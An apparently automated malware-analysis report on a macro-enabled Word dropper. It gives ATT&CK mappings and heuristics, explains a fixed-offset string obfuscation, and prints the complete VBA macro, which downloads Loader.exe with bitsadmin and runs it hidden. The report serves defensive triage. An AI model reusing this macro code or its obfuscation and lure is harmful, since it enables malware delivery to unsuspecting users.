Verdict: MALICIOUS
Risk Score: 190
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution (as mapped by the analyzer; note that nothing in this report shows a parser or memory-corruption exploit. Execution depends on the user clicking "Enable Content", which ATT&CK classifies more precisely as T1204.002 User Execution: Malicious File.)
The sample contains a VBA macro with an AutoOpen subroutine that assembles a command string from obfuscated fragments and runs it with Shell(..., vbHide). The obfuscation is a fixed-offset character substitution: Rhphlnjibgbxcljzd() subtracts a caller-supplied offset from every character code except space (ASCII 32), and Wawczspesfvoswaigne() is a wrapper that fixes the offset at 3. Decoding the fragments in the preview below yields a cmd.exe command that pauses with waitfor, downloads Loader.exe from a .bid domain with bitsadmin /transfer into %appdata% under a random filename, and starts it, so the sample is a downloader, consistent with the ClamAV name Doc.Dropper.Agent. The MsgBox text decodes to a fake "Error 19874: You must have Office Professional Edition..." licence error shown after the Shell call. The If blocks with arithmetic and Len() comparisons are dead-code padding (727 * 6 is never 17036 - 3395, and Len("fyaxaca") is never 630), so the inner MsgBox branches never execute. The document body explicitly instructs the user to "Enable editing" and "Enable Content", a common lure for macro-based malware.
Heuristics (7)
- ClamAV: Doc.Dropper.Agent-6477314-0 | critical | CLAMAV_DETECTION
  ClamAV detected this file as malware: Doc.Dropper.Agent-6477314-0
- VBA macros detected | medium | OLE_VBA_MACROS (2 related findings)
  Document contains VBA macro code
- Shell() call in VBA | critical | OLE_VBA_SHELL
  Matched line in script: Shell Jbpaven, vbHide (immediately followed by MsgBox Gkkaxnwwlyredlaks, the decoy error dialog)
- AutoOpen macro | low | OLE_VBA_AUTOOPEN
  Matched line in script: Sub AutoOpen() in module "NewMacros", followed by the first concatenation statement that builds Jbpaven from Wawczspesfvoswaigne("fpg1h{h 2f %zdlwiru ") & Wawczspesfvoswaigne("2w 8 \NHUT ) elwvdgp") & ... (full text in the preview below)
- Legacy WordBasic auto-exec macro marker | medium | OLE_LEGACY_WORDBASIC_AUTOEXEC
  OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  Caveat for this sample: the generic description above does not match the rest of the report. A VBA project was recovered (macros.bas, below), so this finding duplicates OLE_VBA_AUTOOPEN rather than adding evidence.
- Macro/content-enable lure | medium | SE_ENABLE_LURE
  Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
- Embedded URL | info | EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All twelve URLs below were found in document text (OLE body):
  - http://www.w3.org/1999/02/22-rdf-syntax-ns#
  - http://ns.adobe.com/xap/1.0/
  - http://purl.org/dc/elements/1.1/
  - http://ns.adobe.com/photoshop/1.0/
  - http://ns.adobe.com/xap/1.0/mm/
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
  - http://ns.adobe.com/tiff/1.0/
  - http://ns.adobe.com/exif/1.0/
  - http://ns.adobe.com/xap/1.0/rights/
  - http://schemas.openxmlformats.org/drawingml/2006/main
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml
  Triage note: every entry is an XML namespace or schema identifier (Adobe XMP/EXIF metadata from an embedded image, OOXML and DrawingML schemas), not a network indicator. The download URL the macro actually contacts is stored only in the obfuscated string fragments and therefore does not appear in this list; it has to be recovered by decoding the macro.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2689 bytes | 2d5e2e475d5b13cc8a5ff3e005f58137e2642802f8cf6f587a005996368a2311 |
Preview of macros.bas (first 1,000 lines of the extracted script; the ThisDocument module attributes are followed by the NewMacros module that carries AutoOpen):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
Jbpaven = Jbpaven & Wawczspesfvoswaigne("fpg1h{h 2f %zdlwiru ") & Wawczspesfvoswaigne("2w 8 \NHUT ) elwvdgp") & Wawczspesfvoswaigne("lq 2wudq") & Wawczspesfvoswaigne("vihu ") & Wawczspesfvoswaigne("XNH") & Wawczspesfvoswaigne("I 2grzqordg 2sul") & Wawczspesfvoswaigne("rulw| qrupdo kw") & Wawczspesfvoswaigne("wsv=22zzz1zwuompsj")
Jbpaven = Jbpaven & Wawczspesfvoswaigne("6j}oj1elg2Ordghu1h{h (") & Wawczspesfvoswaigne("dssgd") & Wawczspesfvoswaigne("wd(_ypef|m1h{h )vwdu") & Wawczspesfvoswaigne("w (dssgdwd(_ypef|m1h{h%")
Gkkaxnwwlyredlaks = Gkkaxnwwlyredlaks & Wawczspesfvoswaigne("Huur") & Wawczspesfvoswaigne("u 4<;:7= \rx pxvw kdyh Riil") & Wawczspesfvoswaigne("fh Surihvvlrqdo Hglwlrq wr u") & Wawczspesfvoswaigne("hdg wklv") & Wawczspesfvoswaigne(" frqw") & Wawczspesfvoswaigne("hqw/ sohdvh xsjudgh |rxu")
Gkkaxnwwlyredlaks = Gkkaxnwwlyredlaks & Wawczspesfvoswaigne(" olfhqfh1 Yl") & Wawczspesfvoswaigne("vlw ") & Wawczspesfvoswaigne("zzz1plfurvriw1frp iru khos")
Shell Jbpaven, vbHide
MsgBox Gkkaxnwwlyredlaks
If 727 * 6 = 17036 - 3395 Then
tddhtex = "eugbj"
End If
End Sub
Private Function Rhphlnjibgbxcljzd(ByVal Gpnamnf As String, ByVal Mtafulesi As Long) As String
Dim Ovifmhfsnzykltbrds, Lrsfhksgaaek, Baouxkhbylupdrtsagkfosm As Long
If Len("fyaxaca") <> 630 Then
' dnrbhhoz
Else
' tyudk
MsgBox "avklwlv", 24, "sgzbxpee"
End If
Ovifmhfsnzykltbrds = Len(Gpnamnf)
Dim Bljuajbxboklsawhuhyb As String
Dim Defmvhhjazarcxx() As Long
ReDim Defmvhhjazarcxx(1 To Ovifmhfsnzykltbrds)
For Baouxkhbylupdrtsagkfosm = 1 To Ovifmhfsnzykltbrds
Lrsfhksgaaek = Asc(Mid(Gpnamnf, Baouxkhbylupdrtsagkfosm, 1))
If Lrsfhksgaaek = 32 Then
Defmvhhjazarcxx(Baouxkhbylupdrtsagkfosm) = Lrsfhksgaaek
Else:
Lrsfhksgaaek = Lrsfhksgaaek - Mtafulesi
If 70 * 6 = 24790 - 3979 Then
lngxuox = "koutnoa"
End If
Defmvhhjazarcxx(Baouxkhbylupdrtsagkfosm) = Lrsfhksgaaek
End If
If Len("nlpec") <> 442 Then
' hnrzymeg
Else
' fztsl
MsgBox "xnickf", 574, "mzrwjhv"
End If
Bljuajbxboklsawhuhyb = Bljuajbxboklsawhuhyb & Chr(Defmvhhjazarcxx(Baouxkhbylupdrtsagkfosm))
Next
Rhphlnjibgbxcljzd = Bljuajbxboklsawhuhyb
End Function
Private Function Wawczspesfvoswaigne(Mtwf As String)
If Len("wioohj") <> 819 Then
' kvdkyz
Else
' zjtpkh
MsgBox "otcwo", 581, "dktkn"
End If
Wawczspesfvoswaigne = Rhphlnjibgbxcljzd(Mtwf, 3)
End Function